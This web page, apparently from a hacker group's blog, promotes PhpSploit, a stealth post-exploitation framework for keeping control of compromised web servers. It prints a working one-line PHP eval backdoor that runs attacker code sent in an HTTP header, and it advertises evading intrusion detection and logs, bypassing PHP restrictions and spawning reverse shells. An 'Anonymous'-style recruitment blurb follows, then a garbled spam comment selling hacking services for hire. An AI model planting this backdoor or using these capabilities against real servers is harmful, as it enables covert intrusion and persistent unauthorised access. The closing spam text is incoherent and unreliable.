PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalationpurposes.
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>Features
- Efficient: More than 20 plugins to automate post-exploitation tasks
- Run commands and browse filesystem, bypassing PHP security restrictions
- Upload/Download files between client and target
- Edit remote files through local text editor
- Run SQL console on target system
- Spawn reverse TCP shells
- Stealth: The framework is made by paranoids, for paranoids
- Nearly invisible by log analysis and NIDS signature detection
- Safe-mode and common PHP security restrictions bypass
- Communications are hidden in HTTP Headers
- Loaded payloads are obfuscated to bypass NIDS
- http/https/socks4/socks5 Proxy support
- Convenient: A robust interface with many crucial features
- Detailed help for any command or option (type
help) - Cross-platform on both the client and the server.
- Powerful interface with completion and multi-command support
- Session saving/loading feature & persistent history
- Multi-request support for large payloads (such as uploads)
- Provides a powerful, highly configurable settings engine
- Each setting, such as user-agent has a polymorphic mode
- Customisable environment variables for plugin interaction
- Provides a complete plugin development API
- Detailed help for any command or option (type
Supported platforms (as attacker):
- GNU/Linux
- Mac OS X
Supported platforms (as target):
- GNU/Linux
- BSD Like
- Mac OS X
- Windows NT
Welcome, We are CyberFoxes. We Anonymous Hackers Group is a group of people on the internet who need.
CyberFoxes has no leadership no action can be attributed to the membership as a whole anyone can be part of it. Internet is a virtual world you can do everything with this if you have an ability. There is no fee no guru membership are open if you want to become a member of our organization, and if you believe in us, call yourself Anonymous, you are Anonymous, anyone can be a part of it. Nobody can say you're in or out.Nobody can speak for anonymous. Anonymous has no centralized infrastructure, You can only recognize us by guy fox mask.
Remind this we have no any official headquarters, no organization, and no any official facebook page.
We provide secure and private email accounts, accessible IMAP, or POP. We run EJabberd (XMPP application server) instant messaging (IM) [ Mandatory encryption on XMPP ] Free public Jabber Account Registration, ZeroBin(pastebin/discussion board where the server has zero knowledge of hosted data), virtual private network (VPN), Internet Relay Chat (IRC) + own webchat, WebHosting, EtherPad a web-based collaborative real-time editor and Icecast a streaming media, Tor (The Onion Router). These services are still under development, and may be unreliable at times. If you want to help test them, please give them a try.
Whereas it gazettes to necessity deputys, numerous would notify that the pillar is the essential to whether your coarses is a dissemble or clod. hacking services for hire
ReplyDelete